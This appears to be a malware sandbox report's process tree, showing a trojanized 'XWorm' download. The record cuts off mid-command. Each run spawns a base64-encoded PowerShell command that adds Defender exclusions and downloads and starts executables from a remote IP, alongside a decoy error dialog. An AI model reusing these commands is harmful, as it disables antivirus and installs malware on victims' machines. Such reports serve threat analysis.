  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:4428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:2660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
  2⤵
  PID:1868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
  2⤵
  PID:4972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3296 /prefetch:8
  2⤵
  PID:1088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4992 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6532 /prefetch:1
  2⤵
  PID:3864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  2⤵
  PID:4292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1
  2⤵
  PID:1204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
  2⤵
  PID:1212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  2⤵
  PID:3480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
  2⤵
  PID:4892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6892 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
  2⤵
  PID:1372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7496 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8084 /prefetch:1
  2⤵
  PID:4792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7940 /prefetch:1
  2⤵
  PID:2020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:248

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4436

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2908

C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\xworm.exe
"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\xworm.exe"
1⤵
- Suspicious use of SetThreadContext
PID:3468
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:4628
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Avdis.bat" "
      4⤵
      PID:460
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 248
  2⤵
  - Program crash
  PID:3336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3468 -ip 3468
1⤵
PID:1388

C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\xworm.exe
"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\xworm.exe"
1⤵
- Suspicious use of SetThreadContext
PID:2320
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:3008
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2292
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Avdis.bat" "
      4⤵
      PID:2320
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 244
  2⤵
  - Program crash
  PID:3660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2320 -ip 2320
1⤵
PID:428

C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\xworm.exe
"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\xworm.exe"
1⤵
- Suspicious use of SetThreadContext
PID:2308
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:4216
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcg